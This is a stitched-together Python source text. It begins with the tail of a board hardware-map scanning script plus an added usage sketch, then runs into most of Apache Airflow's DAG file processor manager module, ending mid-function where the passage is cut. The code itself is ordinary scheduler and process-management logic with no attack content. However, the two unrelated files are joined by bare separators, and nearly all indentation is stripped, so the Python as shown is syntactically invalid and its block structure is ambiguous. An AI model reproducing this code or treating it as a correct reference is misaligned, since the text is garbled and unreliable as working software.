with open(hwm_file, 'w') as yaml_file:
yaml.dump(dl, yaml_file, Dumper=Dumper, default_flow_style=False)
logger.info("Detected devices:")
self.dump(detected=True)
def dump(self, filtered=[], header=[], connected_only=False, detected=False):
print("")
table = []
if detected:
to_show = self.detected
else:
to_show = self.duts
if not header:
header = ["Platform", "ID", "Serial device"]
for p in to_show:
platform = p.platform
connected = p.connected
if filtered and platform not in filtered:
continue
if not connected_only or connected:
table.append([platform, p.id, p.serial])
print(tabulate(table, headers=header, tablefmt="github"))
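# --- Illustrative usage sketch (not part of the original script) ---
# A minimal sketch, assuming pyserial is installed and the module-level logger
# is configured; it scans connected boards and prints the detected table,
# similar to what twister's --generate-hardware-map option does.
if __name__ == "__main__":
    hwm = HardwareMap()
    hwm.scan(persistent=False)   # populate hwm.detected from USB serial devices
    hwm.dump(detected=True)      # print a github-style table of detected boards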
|
manager.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Processes DAGs."""
import enum
import importlib
import inspect
import logging
import multiprocessing
import os
import random
import signal
import sys
import time
from collections import defaultdict
from datetime import datetime, timedelta
from importlib import import_module
from multiprocessing.connection import Connection as MultiprocessingConnection
from typing import TYPE_CHECKING, Any, Dict, List, NamedTuple, Optional, Union, cast
from setproctitle import setproctitle
from sqlalchemy import or_
from tabulate import tabulate
import airflow.models
from airflow.configuration import conf
from airflow.dag_processing.processor import DagFileProcessorProcess
from airflow.models import DagModel, errors
from airflow.models.serialized_dag import SerializedDagModel
from airflow.models.taskinstance import SimpleTaskInstance
from airflow.stats import Stats
from airflow.utils import timezone
from airflow.utils.callback_requests import CallbackRequest, SlaCallbackRequest, TaskCallbackRequest
from airflow.utils.file import list_py_file_paths
from airflow.utils.log.logging_mixin import LoggingMixin
from airflow.utils.mixins import MultiprocessingStartMethodMixin
from airflow.utils.net import get_hostname
from airflow.utils.process_utils import kill_child_processes_by_pids, reap_process_group
from airflow.utils.session import provide_session
from airflow.utils.state import State
if TYPE_CHECKING:
import pathlib
class DagParsingStat(NamedTuple):
"""Information on processing progress"""
done: bool
all_files_processed: bool
class DagFileStat(NamedTuple):
"""Information about single processing of one file"""
num_dags: int
import_errors: int
last_finish_time: Optional[datetime]
last_duration: Optional[float]
run_count: int
class DagParsingSignal(enum.Enum):
"""All signals sent to parser."""
AGENT_RUN_ONCE = 'agent_run_once'
TERMINATE_MANAGER = 'terminate_manager'
END_MANAGER = 'end_manager'
class DagFileProcessorAgent(LoggingMixin, MultiprocessingStartMethodMixin):
"""
Agent for DAG file processing. It is responsible for all DAG parsing-related
jobs in the scheduler process. It mainly spins up DagFileProcessorManager
in a subprocess, collects DAG parsing results from it, and exchanges
signals and DAG parsing stats with it.
This class runs in the main `airflow scheduler` process.
:param dag_directory: Directory where DAG definitions are kept. All
files in file_paths should be under this directory
:type dag_directory: str
:param max_runs: The number of times to parse and schedule each file. -1
for unlimited.
:type max_runs: int
:param processor_timeout: How long to wait before timing out a DAG file processor
:type processor_timeout: timedelta
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[str]
:param pickle_dags: whether to pickle DAGs.
:type pickle_dags: bool
:param async_mode: Whether to start agent in async mode
:type async_mode: bool
"""
def __init__(
self,
dag_directory: str,
max_runs: int,
processor_timeout: timedelta,
dag_ids: Optional[List[str]],
pickle_dags: bool,
async_mode: bool,
):
super().__init__()
self._file_path_queue: List[str] = []
self._dag_directory: str = dag_directory
self._max_runs = max_runs
self._processor_timeout = processor_timeout
self._dag_ids = dag_ids
self._pickle_dags = pickle_dags
self._async_mode = async_mode
# Map from file path to the processor
self._processors: Dict[str, DagFileProcessorProcess] = {}
# Pipe for communicating signals
self._process: Optional[multiprocessing.process.BaseProcess] = None
self._done: bool = False
# Initialized as true so we do not deactivate w/o any actual DAG parsing.
self._all_files_processed = True
self._parent_signal_conn: Optional[MultiprocessingConnection] = None
self._last_parsing_stat_received_at: float = time.monotonic()
def start(self) -> None:
"""Launch DagFileProcessorManager processor and start DAG parsing loop in manager."""
mp_start_method = self._get_multiprocessing_start_method()
context = multiprocessing.get_context(mp_start_method)
self._last_parsing_stat_received_at = time.monotonic()
self._parent_signal_conn, child_signal_conn = context.Pipe()
process = context.Process(
target=type(self)._run_processor_manager,
args=(
self._dag_directory,
self._max_runs,
self._processor_timeout,
child_signal_conn,
self._dag_ids,
self._pickle_dags,
self._async_mode,
),
)
self._process = process
process.start()
self.log.info("Launched DagFileProcessorManager with pid: %s", process.pid)
def run_single_parsing_loop(self) -> None:
"""
Should only be used when the DAG file processor manager was launched in sync mode.
Send agent heartbeat signal to the manager, requesting that it runs one
processing "loop".
Call wait_until_finished to ensure that any launched processors have
finished before continuing
"""
if not self._parent_signal_conn or not self._process:
raise ValueError("Process not started.")
if not self._process.is_alive():
return
try:
self._parent_signal_conn.send(DagParsingSignal.AGENT_RUN_ONCE)
except ConnectionError:
# If the manager process died because of an error, it will be noticed and
# restarted when harvest_serialized_dags calls _heartbeat_manager.
pass
def send_callback_to_execute(self, request: CallbackRequest) -> None:
"""
Sends information about the callback to be executed by DagFileProcessor.
:param request: Callback request to be executed.
:type request: CallbackRequest
"""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
try:
self._parent_signal_conn.send(request)
except ConnectionError:
# If the manager process died because of an error, it will be noticed and
# restarted when harvest_serialized_dags calls _heartbeat_manager.
pass
def send_sla_callback_request_to_execute(self, full_filepath: str, dag_id: str) -> None:
"""
Sends information about the SLA callback to be executed by DagFileProcessor.
:param full_filepath: DAG File path
:type full_filepath: str
:param dag_id: DAG ID
:type dag_id: str
"""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
try:
request = SlaCallbackRequest(full_filepath=full_filepath, dag_id=dag_id)
self._parent_signal_conn.send(request)
except ConnectionError:
# If the manager process died because of an error, it will be noticed and
# restarted when harvest_serialized_dags calls _heartbeat_manager.
pass
def wait_until_finished(self) -> None:
"""Waits until DAG parsing is finished."""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
if self._async_mode:
raise RuntimeError("wait_until_finished should only be called in sync_mode")
while self._parent_signal_conn.poll(timeout=None):
try:
result = self._parent_signal_conn.recv()
except EOFError:
return
self._process_message(result)
if isinstance(result, DagParsingStat):
# In sync mode (which is the only time we call this function) we don't send this message from
# the Manager until all the running processors have finished
return
@staticmethod
def _run_processor_manager(
dag_directory: str,
max_runs: int,
processor_timeout: timedelta,
signal_conn: MultiprocessingConnection,
dag_ids: Optional[List[str]],
pickle_dags: bool,
async_mode: bool,
) -> None:
# Make this process start as a new process group - that makes it easy
# to kill all sub-processes of it at the OS level, rather than having
# to iterate over the child processes
os.setpgid(0, 0)
setproctitle("airflow scheduler -- DagFileProcessorManager")
# Reload configurations and settings to avoid colliding with the parent process.
# This process may need custom configurations that cannot be shared,
# e.g. a RotatingFileHandler, and connections can be corrupted if we
# do not recreate the SQLAlchemy connection pool.
os.environ['CONFIG_PROCESSOR_MANAGER_LOGGER'] = 'True'
os.environ['AIRFLOW__LOGGING__COLORED_CONSOLE_LOG'] = 'False'
# Replicating the behavior of how logging module was loaded
# in logging_config.py
importlib.reload(import_module(airflow.settings.LOGGING_CLASS_PATH.rsplit('.', 1)[0])) # type: ignore
importlib.reload(airflow.settings)
airflow.settings.initialize()
del os.environ['CONFIG_PROCESSOR_MANAGER_LOGGER']
processor_manager = DagFileProcessorManager(
dag_directory,
max_runs,
processor_timeout,
signal_conn,
dag_ids,
pickle_dags,
async_mode,
)
processor_manager.start()
def heartbeat(self) -> None:
"""Check if the DagFileProcessorManager process is alive, and process any pending messages"""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
# Receive any pending messages before checking if the process has exited.
while self._parent_signal_conn.poll(timeout=0.01):
try:
result = self._parent_signal_conn.recv()
except (EOFError, ConnectionError):
break
self._process_message(result)
# If it died unexpectedly restart the manager process
self._heartbeat_manager()
def _process_message(self, message):
self.log.debug("Received message of type %s", type(message).__name__)
if isinstance(message, DagParsingStat):
self._sync_metadata(message)
else:
raise RuntimeError(f"Unexpected message received of type {type(message).__name__}")
def _heartbeat_manager(self):
"""Heartbeat DAG file processor and restart it if we are not done."""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
if self._process and not self._process.is_alive():
self._process.join(timeout=0)
if not self.done:
self.log.warning(
"DagFileProcessorManager (PID=%d) exited with exit code %d - re-launching",
self._process.pid,
self._process.exitcode,
)
self.start()
if self.done:
return
parsing_stat_age = time.monotonic() - self._last_parsing_stat_received_at
if parsing_stat_age > self._processor_timeout.total_seconds():
Stats.incr('dag_processing.manager_stalls')
self.log.error(
"DagFileProcessorManager (PID=%d) last sent a heartbeat %.2f seconds ago! Restarting it",
self._process.pid,
parsing_stat_age,
)
reap_process_group(self._process.pid, logger=self.log)
self.start()
def _sync_metadata(self, stat):
"""Sync metadata from stat queue and only keep the latest stat."""
self._done = stat.done
self._all_files_processed = stat.all_files_processed
self._last_parsing_stat_received_at = time.monotonic()
@property
def done(self) -> bool:
"""Has DagFileProcessorManager ended?"""
return self._done
@property
def all_files_processed(self):
"""Have all files been processed at least once?"""
return self._all_files_processed
def terminate(self):
"""
Send termination signal to DAG parsing processor manager
and expect it to terminate all DAG file processors.
"""
if self._process and self._process.is_alive():
self.log.info("Sending termination message to manager.")
try:
self._parent_signal_conn.send(DagParsingSignal.TERMINATE_MANAGER)
except ConnectionError:
pass
def end(self):
"""
Terminate (and then kill) the manager process launched.
:return:
"""
if not self._process:
self.log.warning('Ending without manager process.')
return
# Give the Manager some time to cleanly shut down, but not too long, as
# it's better to finish sooner than wait for (non-critical) work to
# finish
self._process.join(timeout=1.0)
reap_process_group(self._process.pid, logger=self.log)
self._parent_signal_conn.close()
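# --- Illustrative lifecycle sketch (comments only; not part of upstream code) ---
# A minimal sketch of how a scheduler might drive the agent in sync mode, based
# on the methods above (the dag_directory path and timeout are placeholders):
#
#   agent = DagFileProcessorAgent(
#       dag_directory="/path/to/dags",        # hypothetical path
#       max_runs=1,
#       processor_timeout=timedelta(minutes=5),
#       dag_ids=None,
#       pickle_dags=False,
#       async_mode=False,
#   )
#   agent.start()                      # forks the DagFileProcessorManager
#   agent.run_single_parsing_loop()    # ask the manager for one parsing "loop"
#   agent.wait_until_finished()        # block until a DagParsingStat is received
#   agent.heartbeat()                  # process pending messages, restart if dead
#   agent.terminate()
#   agent.end()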
class DagFileProcessorManager(LoggingMixin):
"""
Given a list of DAG definition files, this kicks off several processors
in parallel to process them and puts the results into a multiprocessing.Queue
for DagFileProcessorAgent to harvest. The parallelism is limited, and as
processors finish, more are launched. The files are processed over and
over again, but no more often than the specified interval.
:param dag_directory: Directory where DAG definitions are kept. All
files in file_paths should be under this directory
:type dag_directory: unicode
:param max_runs: The number of times to parse and schedule each file. -1
for unlimited.
:type max_runs: int
:param processor_timeout: How long to wait before timing out a DAG file processor
:type processor_timeout: timedelta
:param signal_conn: connection to communicate signal with processor agent.
:type signal_conn: MultiprocessingConnection
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[str]
:param pickle_dags: whether to pickle DAGs.
:type pickle_dags: bool
:param async_mode: whether to start the manager in async mode
:type async_mode: bool
"""
def __init__(
self,
dag_directory: Union[str, "pathlib.Path"],
max_runs: int,
processor_timeout: timedelta,
signal_conn: MultiprocessingConnection,
dag_ids: Optional[List[str]],
pickle_dags: bool,
async_mode: bool = True,
):
super().__init__()
self._file_paths: List[str] = []
self._file_path_queue: List[str] = []
self._dag_directory = dag_directory
self._max_runs = max_runs
self._signal_conn = signal_conn
self._pickle_dags = pickle_dags
self._dag_ids = dag_ids
self._async_mode = async_mode
self._parsing_start_time: Optional[int] = None
# Set the signal conn into non-blocking mode, so that attempting to
# send when the buffer is full raises an error, rather than hanging forever
# attempting to send (this is to avoid deadlocks!)
#
# Don't do this in sync_mode, as we _need_ the DagParsingStat sent to
# continue the scheduler
if self._async_mode:
os.set_blocking(self._signal_conn.fileno(), False)
self._parallelism = conf.getint('scheduler', 'parsing_processes')
if conf.get('core', 'sql_alchemy_conn').startswith('sqlite') and self._parallelism > 1:
self.log.warning(
"Because we cannot use more than 1 thread (parsing_processes = "
"%d ) when using sqlite. So we set parallelism to 1.",
self._parallelism,
)
self._parallelism = 1
# Parse and schedule each file no faster than this interval.
self._file_process_interval = conf.getint('scheduler', 'min_file_process_interval')
# How often to print out DAG file processing stats to the log. Default to
# 30 seconds.
self.print_stats_interval = conf.getint('scheduler', 'print_stats_interval')
# How many seconds to wait for a task heartbeat before marking it as a zombie.
self._zombie_threshold_secs = conf.getint('scheduler', 'scheduler_zombie_task_threshold')
# Map from file path to the processor
self._processors: Dict[str, DagFileProcessorProcess] = {}
self._num_run = 0
# Map from file path to stats about the file
self._file_stats: Dict[str, DagFileStat] = {}
self._last_zombie_query_time = None
# Last time that the DAG dir was traversed to look for files
self.last_dag_dir_refresh_time = timezone.make_aware(datetime.fromtimestamp(0))
# Last time stats were printed
self.last_stat_print_time = 0
# TODO: Remove magic number
self._zombie_query_interval = 10
# How long to wait before timing out a process to parse a DAG file
self._processor_timeout = processor_timeout
# How often to scan the DAGs directory for new files. Default to 5 minutes.
self.dag_dir_list_interval = conf.getint('scheduler', 'dag_dir_list_interval')
# Mapping file name and callbacks requests
self._callback_to_execute: Dict[str, List[CallbackRequest]] = defaultdict(list)
self._log = logging.getLogger('airflow.processor_manager')
self.waitables: Dict[Any, Union[MultiprocessingConnection, DagFileProcessorProcess]] = {
self._signal_conn: self._signal_conn,
}
def register_exit_signals(self):
"""Register signals that stop child processes"""
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
# So that we ignore the debug dump signal, making it easier to send
signal.signal(signal.SIGUSR2, signal.SIG_IGN)
def _exit_gracefully(self, signum, frame):
"""Helper method to clean up DAG file processors to avoid leaving orphan processes."""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
self.log.debug("Current Stacktrace is: %s", '\n'.join(map(str, inspect.stack())))
self.terminate()
self.end()
self.log.debug("Finished terminating DAG processors.")
sys.exit(os.EX_OK)
def start(self):
"""
Use multiple processes to parse and generate tasks for the
DAGs in parallel. By processing them in separate processes,
we can get parallelism and isolation from potentially harmful
user code.
"""
self.register_exit_signals()
# Start a new process group
os.setpgid(0, 0)
self.log.info("Processing files using up to %s processes at a time ", self._parallelism)
self.log.info("Process each file at most once every %s seconds", self._file_process_interval)
self.log.info(
"Checking for new files in %s every %s seconds", self._dag_directory, self.dag_dir_list_interval
)
return self._run_parsing_loop()
def _run_parsing_loop(self):
# In sync mode we want timeout=None -- wait forever until a message is received
if self._async_mode:
poll_time = 0.0
else:
poll_time = None
self._refresh_dag_dir()
self.prepare_file_path_queue()
if self._async_mode:
# If we're in async mode, we can start up straight away. If we're
# in sync mode we need to be told to start a "loop"
self.start_new_processes()
while True:
loop_start_time = time.monotonic()
ready = multiprocessing.connection.wait(self.waitables.keys(), timeout=poll_time)
if self._signal_conn in ready:
agent_signal = self._signal_conn.recv()
self.log.debug("Received %s signal from DagFileProcessorAgent", agent_signal)
if agent_signal == DagParsingSignal.TERMINATE_MANAGER:
self.terminate()
break
elif agent_signal == DagParsingSignal.END_MANAGER:
self.end()
sys.exit(os.EX_OK)
elif agent_signal == DagParsingSignal.AGENT_RUN_ONCE:
# continue the loop to parse dags
pass
elif isinstance(agent_signal, CallbackRequest):
self._add_callback_to_queue(agent_signal)
else:
raise ValueError(f"Invalid message {type(agent_signal)}")
if not ready and not self._async_mode:
# In "sync" mode we don't want to parse the DAGs until we
# are told to (as that would open another connection to the
# SQLite DB which isn't a good practice
# This shouldn't happen, as in sync mode poll should block for
# ever. Lets be defensive about that.
self.log.warning(
"wait() unexpectedly returned nothing ready after infinite timeout (%r)!", poll_time
)
continue
for sentinel in ready:
if sentinel is self._signal_conn:
continue
processor = self.waitables.get(sentinel)
if not processor:
continue
self._collect_results_from_processor(processor)
self.waitables.pop(sentinel)
self._processors.pop(processor.file_path)
self._refresh_dag_dir()
self._find_zombies()
self._kill_timed_out_processors()
# Generate more file paths to process if we processed all the files
# already.
if not self._file_path_queue:
self.emit_metrics()
self.prepare_file_path_queue()
self.start_new_processes()
# Update the number of loop iterations.
self._num_run += 1
if not self._async_mode:
self.log.debug("Waiting for processors to finish since we're using sqlite")
# Wait until the running DAG processors are finished before
# sending a DagParsingStat message back. This means the Agent
# can tell we've got to the end of this iteration when it sees
# this type of message
self.wait_until_finished()
# Collect anything else that has finished, but don't kick off any more processors
self.collect_results()
self._print_stat()
all_files_processed = all(self.get_last_finish_time(x) is not None for x in self.file_paths)
max_runs_reached = self.max_runs_reached()
try:
self._signal_conn.send(
DagParsingStat(
max_runs_reached,
all_files_processed,
)
)
except BlockingIOError:
# Try again next time around the loop!
# It is better to fail than to deadlock. This should
# "almost never happen" since the DagParsingStat object is
# small, and in async mode this stat is not actually _required_
# for normal operation (It only drives "max runs")
self.log.debug("BlockingIOError received trying to send DagParsingStat, ignoring")
if max_runs_reached:
self.log.info(
"Exiting dag parsing loop as all files have been processed %s times", self._max_runs
)
break
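# Pace the loop in async mode: if this iteration took less than a second,
# the next wait() call sleeps for the remainder; otherwise poll immediately.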
if self._async_mode:
loop_duration = time.monotonic() - loop_start_time
if loop_duration < 1:
poll_time = 1 - loop_duration
else:
poll_time = 0.0
def _add_callback_to_queue(self, request: CallbackRequest):
self._callback_to_execute[request.full_filepath].append(request)
# Callbacks have a higher priority than DAG Run scheduling
if request.full_filepath in self._file_path_queue:
# Remove file paths matching request.full_filepath from self._file_path_queue
# Since we are already going to use that filepath to run the callback,
# there is no need to have the same file path in the queue again
self._file_path_queue = [
file_path for file_path in self._file_path_queue if file_path != request.full_filepath
]
self._file_path_queue.insert(0, request.full_filepath)
def _refresh_dag_dir(self):
"""Refresh file paths from dag dir if we haven't done it for too long."""
now = timezone.utcnow()
elapsed_time_since_refresh = (now - self.last_dag_dir_refresh_time).total_seconds()
if elapsed_time_since_refresh > self.dag_dir_list_interval:
# Build up a list of Python files that could contain DAGs
self.log.info("Searching for files in %s", self._dag_directory)
self._file_paths = list_py_file_paths(self._dag_directory)
self.last_dag_dir_refresh_time = now
self.log.info("There are %s files in %s", len(self._file_paths), self._dag_directory)
self.set_file_paths(self._file_paths)
try:
self.log.debug("Removing old import errors")
self.clear_nonexistent_import_errors()
except Exception:
self.log.exception("Error removing old import errors")
SerializedDagModel.remove_deleted_dags(self._file_paths)
DagModel.deactivate_deleted_dags(self._file_paths)
from airflow.models.dagcode import DagCode
DagCode.remove_deleted_code(self._file_paths)
def _print_stat(self):
"""Occasionally print out stats about how fast the files are getting processed"""
if 0 < self.print_stats_interval < time.monotonic() - self.last_stat_print_time:
if self._file_paths:
self._log_file_processing_stats(self._file_paths)
self.last_stat_print_time = time.monotonic()
@provide_session
def clear_nonexistent_import_errors(self, session):
"""
Clears import errors for files that no longer exist.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
"""
query = session.query(errors.ImportError)
if self._file_paths:
query = query.filter(~errors.ImportError.filename.in_(self._file_paths))
query.delete(synchronize_session='fetch')
session.commit()
def _log_file_processing_stats(self, known_file_paths):
"""
Print out stats about how files are getting processed.
:param known_file_paths: a list of file paths that may contain Airflow
DAG definitions
:type known_file_paths: list[unicode]
:return: None
"""
# File Path: Path to the file containing the DAG definition
# PID: PID associated with the process that's processing the file. May
# be empty.
# Runtime: If the process is currently running, how long it's been
# running for in seconds.
# Last Runtime: If the process ran before, how long did it take to
# finish in seconds
# Last Run: When the file finished processing in the previous run.
headers = ["File Path", "PID", "Runtime", "# DAGs", "# Errors", "Last Runtime", "Last Run"]
rows = []
now = timezone.utcnow()
for file_path in known_file_paths:
last_runtime = self.get_last_runtime(file_path)
num_dags = self.get_last_dag_count(file_path)
num_errors = self.get_last_error_count(file_path)
file_name = os.path.basename(file_path)
file_name = os.path.splitext(file_name)[0].replace(os.sep, '.')
processor_pid = self.get_pid(file_path)
processor_start_time = self.get_start_time(file_path)
runtime = (now - processor_start_time) if processor_start_time else None
last_run = self.get_last_finish_time(file_path)
if last_run:
seconds_ago = (now - last_run).total_seconds()
Stats.gauge(f'dag_processing.last_run.seconds_ago.{file_name}', seconds_ago)
rows.append((file_path, processor_pid, runtime, num_dags, num_errors, last_runtime, last_run))
# Sort by longest last runtime. (Can't sort None values in python3)
rows = sorted(rows, key=lambda x: x[3] or 0.0)
formatted_rows = []
for file_path, pid, runtime, num_dags, num_errors, last_runtime, last_run in rows:
formatted_rows.append(
(
file_path,
pid,
f"{runtime.total_seconds():.2f}s" if runtime else None,
num_dags,
num_errors,
f"{last_runtime:.2f}s" if last_runtime else None,
last_run.strftime("%Y-%m-%dT%H:%M:%S") if last_run else None,
)
)
log_str = (
"\n"
+ "=" * 80
+ "\n"
+ "DAG File Processing Stats\n\n"
+ tabulate(formatted_rows, headers=headers)
+ "\n"
+ "=" * 80
)
self.log.info(log_str)
def get_pid(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the PID of the process processing the given file or None if
the specified file is not being processed
:rtype: int
"""
if file_path in self._processors:
return self._processors[file_path].pid
return None
def get_all_pids(self):
"""
:return: a list of the PIDs for the processors that are running
:rtype: List[int]
"""
return [x.pid for x in self._processors.values()]
def get_last_runtime(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the runtime (in seconds) of the process of the last run, or
None if the file was never processed.
:rtype: float
"""
stat = self._file_stats.get(file_path)
return stat.last_duration if stat else None
def get_last_dag_count(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the number of dags loaded from that file, or None if the file
was never processed.
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.num_dags if stat else None
def get_last_error_count(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the number of import errors from processing, or None if the file
was never processed.
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.import_errors if stat else None
def get_last_finish_time(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the finish time of the process of the last run, or None if the
file was never processed.
:rtype: datetime
"""
stat = self._file_stats.get(file_path)
return stat.last_finish_time if stat else None
def get_start_time(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the start time of the process that's processing the
specified file or None if the file is not currently being processed
:rtype: datetime
"""
if file_path in self._processors:
return self._processors[file_path].start_time
return None
def get_run_count(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the number of times the given file has been parsed
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.run_count if stat else 0
def set_file_paths(self, new_file_paths):
"""
Update this with a new set of paths to DAG definition files.
:param new_file_paths: list of paths to DAG definition files
:type new_file_paths: list[unicode]
:return: None
"""
self._file_paths = new_file_paths
self._file_path_queue = [x for x in self._file_path_queue if x in new_file_paths]
# Stop processors that are working on deleted files
filtered_processors = {}
for file_path, processor in self._processors.items():
if file_path in new_file_paths:
filtered_processors[file_path] = processor
else:
self.log.warning("Stopping processor for %s", file_path)
Stats.decr('dag_processing.processes')
processor.terminate()
self._file_stats.pop(file_path)
self._processors = filtered_processors
def wait_until_finished(self):
"""Sleeps until all the processors are done."""
for processor in self._processors.values():
while not processor.done:
time.sleep(0.1)
def _collect_results_from_processor(self, processor) -> None:
self.log.debug("Processor for %s finished", processor.file_path)
Stats.decr('dag_processing.processes')
last_finish_time = timezone.utcnow()
if processor.result is not None:
num_dags, count_import_errors = processor.result
else:
self.log.error(
"Processor for %s exited with return code %s.", processor.file_path, processor.exit_code
)
count_import_errors = -1
num_dags = 0
stat = DagFileStat(
num_dags=num_dags,
import_errors=count_import_errors,
last_finish_time=last_finish_time,
last_duration=(last_finish_time - processor.start_time).total_seconds(),
run_count=self.get_run_count(processor.file_path) + 1,
)
self._file_stats[processor.file_path] = stat
file_name = os.path.splitext(os.path.basename(processor.file_path))[0].replace(os.sep, '.')
Stats.timing(f'dag_processing.last_duration.{file_name}', stat.last_duration)
def collect_results(self) -> None:
"""Collect the result from any finished DAG processors"""
ready = multiprocessing.connection.wait(self.waitables.keys() - [self._signal_conn], timeout=0)
for sentinel in ready:
if sentinel is self._signal_conn:
continue
processor = cast(DagFileProcessorProcess, self.waitables[sentinel])
self.waitables.pop(processor.waitable_handle)
self._processors.pop(processor.file_path)
self._collect_results_from_processor(processor)
self.log.debug("%s/%s DAG parsing processes running", len(self._processors), self._parallelism)
self.log.debug("%s file paths queued for processing", len(self._file_path_queue))
@staticmethod
def _create_process(file_path, pickle_dags, dag_ids, callback_requests):
"""Creates DagFileProcessorProcess instance."""
return DagFileProcessorProcess(
file_path=file_path, pickle_dags=pickle_dags, dag_ids=dag_ids, callback_requests=callback_requests
)
def start_new_processes(self):
"""Start more processors if we have enough slots and files to process"""
while self._parallelism - len(self._processors) > 0 and self._file_path_queue:
file_path = self._file_path_queue.pop(0)
# Avoid creating a duplicate processor, i.e. a processor for the same file path
if file_path in self._processors.keys():
continue
callback_to_execute_for_file = self._callback_to_execute[file_path]
processor = self._create_process(
file_path, self._pickle_dags, self._dag_ids, callback_to_execute_for_file
)
del self._callback_to_execute[file_path]
Stats.incr('dag_processing.processes')
processor.start()
self.log.debug("Started a process (PID: %s) to generate tasks for %s", processor.pid, file_path)
self._processors[file_path] = processor
self.waitables[processor.waitable_handle] = processor
def prepare_file_path_queue(self):
"""Generate more file paths to process. Result are saved in _file_path_queue."""
self._parsing_start_time = time.perf_counter()
# If the file path is already being processed, or if a file was
# processed recently, wait until the next batch
file_paths_in_progress = self._processors.keys()
now = timezone.utcnow()
# Sort the file paths by the parsing order mode
list_mode = conf.get("scheduler", "file_parsing_sort_mode")
files_with_mtime = {}
file_paths = []
is_mtime_mode = list_mode == "modified_time"
file_paths_recently_processed = []
for file_path in self._file_paths:
if is_mtime_mode:
files_with_mtime[file_path] = os.path.getmtime(file_path)
file_modified_time = timezone.make_aware(datetime.fromtimestamp(files_with_mtime[file_path]))
else:
file_paths.append(file_path)
file_modified_time = None
# Find file paths that were recently processed to exclude them
# from being added to file_path_queue
# unless they were modified recently and parsing mode is "modified_time"
# in which case we don't honor "self._file_process_interval" (min_file_process_interval)
last_finish_time = self.get_last_finish_time(file_path)
if (
last_finish_time is not None
and (now - last_finish_time).total_seconds() < self._file_process_interval
and not (is_mtime_mode and file_modified_time and (file_modified_time > last_finish_time))
):
file_paths_recently_processed.append(file_path)
# Sort file paths via last modified time
if is_mtime_mode:
file_paths = sorted(files_with_mtime, key=files_with_mtime.get, reverse=True)
elif list_mode == "alphabetical":
file_paths = sorted(file_paths)
elif list_mode == "random_seeded_by_host":
# Shuffle the list seeded by hostname so multiple schedulers can work on different
# sets of files. Since we set the seed, the order will remain the same per host
random.Random(get_hostname()).shuffle(file_paths)
files_paths_at_run_limit = [
file_path for file_path, stat in self._file_stats.items() if stat.run_count == self._max_runs
]
file_paths_to_exclude = set(file_paths_in_progress).union(
file_paths_recently_processed, files_paths_at_run_limit
)
# Do not convert the following list to a set, as sets do not preserve order,
# and we need to maintain the order of file_paths for `[scheduler] file_parsing_sort_mode`
files_paths_to_queue = [
file_path for file_path in file_paths if file_path not in file_paths_to_exclude
]
for file_path, processor in self._processors.items():
self.log.debug(
"File path %s is still being processed (started: %s)",
processor.file_path,
processor.start_time.isoformat(),
)
self.log.debug("Queuing the following files for processing:\n\t%s", "\n\t".join(files_paths_to_queue))
for file_path in files_paths_to_queue:
if file_path not in self._file_stats:
self._file_stats[file_path] = DagFileStat(
num_dags=0, import_errors=0, last_finish_time=None, last_duration=None, run_count=0
)
self._file_path_queue.extend(files_paths_to_queue)
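# The resulting queue order follows [scheduler] file_parsing_sort_mode:
#   modified_time         -> newest mtime first
#   alphabetical          -> lexicographically sorted paths
#   random_seeded_by_host -> stable per-host shuffle seeded by get_hostname()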
@provide_session
def _find_zombies(self, session):
"""
Find zombie task instances, which are tasks that haven't heartbeated for too long,
and update the current zombie list.
"""
now = timezone.utcnow()
if (
not self._last_zombie_query_time
or (now - self._last_zombie_query_time).total_seconds() > self._zombie_query_interval
):
# to avoid circular imports
from airflow.jobs.local_task_job import LocalTaskJob as LJ
self.log.info("Finding 'running' jobs without a recent heartbeat")
TI = airflow.models.TaskInstance
DM = airflow.models.DagModel
limit_dttm = timezone.utcnow() - timedelta(seconds=self._zombie_threshold_secs)
self.log.info("Failing jobs without heartbeat after %s", limit_dttm)
zombies = (
session.query(TI, DM.fileloc)
.join(LJ, TI.job_id == LJ.id)
.join(DM, TI.dag_id == DM.dag_id)
.filter(TI.state == State.RUNNING)
.filter(
or_(
LJ.state != State.RUNNING,
LJ.latest_heartbeat < limit_dttm,
)
)
.all()
)
self._last_zombie_query_time = timezone.utcnow()
for ti, file_loc in zombies:
request = TaskCallbackRequest(
full_filepath=file_loc,
simple_task_instance=SimpleTaskInstance(ti),
msg="Detected as zombie",
)
self.log.info("Detected zombie job: %s", request)
self._add_callback_to_queue(request)
Stats.incr('zombies_killed')
def _kill_timed_out_processors(self):
"""Kill any file processors that timeout to defend against process hangs."""
now = timezone.utcnow()
for file_path, processor in self._processors.items():
duration = now - processor.start_time
if duration > self._processor_timeout:
self.log.error(
"Processor for %s with PID %s started at %s has timed out, killing it.",
file_path,
processor.pid,
processor.start_time.isoformat(),
)
